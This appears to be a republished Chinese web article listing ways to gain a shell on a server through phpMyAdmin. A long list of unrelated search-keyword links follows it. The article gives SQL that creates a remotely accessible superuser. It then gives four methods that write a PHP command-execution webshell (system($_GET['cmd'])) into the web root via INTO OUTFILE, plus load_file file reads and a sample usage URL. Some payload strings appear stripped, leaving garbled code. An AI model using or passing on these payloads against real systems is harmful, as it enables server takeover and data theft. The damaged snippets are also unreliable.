PHPmyadmin拿shell的方法有哪些
发表于:2024-09-24 作者:千家信息网编辑
千家信息网最后更新 2024年09月24日,这篇文章将为大家详细讲解有关PHPmyadmin拿shell的方法有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。PHPmyadmin修改用户密码直接点击上面的
千家信息网最后更新 2024年09月24日PHPmyadmin拿shell的方法有哪些
这篇文章将为大家详细讲解有关PHPmyadmin拿shell的方法有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
PHPmyadmin修改用户密码
直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可
添加超级用户guetsec密码ooxx并且允许外连
GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
我们可以创建root账户设置密码
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
这样就创建了root外联账户,密码123456,外链时用123456
拿shell四种经典方法:
方法一:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );INSERT INTO `mysql`.`study` (`7on` )VALUES ('');SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on
方法二:
读取文件内容: select load_file('E:/xamp/www/s.php');写一句话: select ''INTO OUTFILE 'E:/xamp/www/study.php'cmd执行权限: select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
方法三:
JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);Insert INTO study (cmd) VALUES('');select cmd from study into outfile 'E:/wamp/www/7.php'; Drop TABLE IF EXISTS study; -------------------------------------------------------------------------------- CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。INSERT INTO study( cmd ) VALUES ('');# 影响列数: 1SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
方法四:
select load_file('E:/xamp/www/study.php');select '\';system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
Phpmyadmin导出一句话时出现(Errcode: 13 - Permission denied)
是对此目录没有权限,可以试试上级目录,或者下级目录
再不行试试NTS引流
还有就是注意目录\
关于"PHPmyadmin拿shell的方法有哪些"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
方法
密码
目录
一句话
用户
篇文章
内容
更多
权限
结果
账户
影响
查询
不行
不错
实用
上级
下级
同时
外联
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
软件开发相关设备
河南工业大学网络安全守则
金融分布式数据库高可用
通州区定制软件开发配置
华为服务族网络技术工程师
网络安全 环保
重汽集团的软件开发岗位待遇
清远腾讯网络技术
数据库查询备份操作
手机网络安全模型
光遇国际服包括哪些地区的服务器
建立数据库设置主键约束
数据库还原3202错误
会员信息录入数据库
简单介绍网络安全的五要素
数据库了
阿里云的云数据库有什么用
国家网络安全局局长
汇丰软件开发工作压力
正方教务管理系统服务器11
网络安全宣传口号八字
数据库字段名如何快速修改
阿里高级网络安全工程师工资
软件开发属于什么服务
数据库技术的的发展
音准 软件开发
访问数据库应用什么技术
从事软件开发累吗
数据库一直还原怎么停止
网络安全教育的现状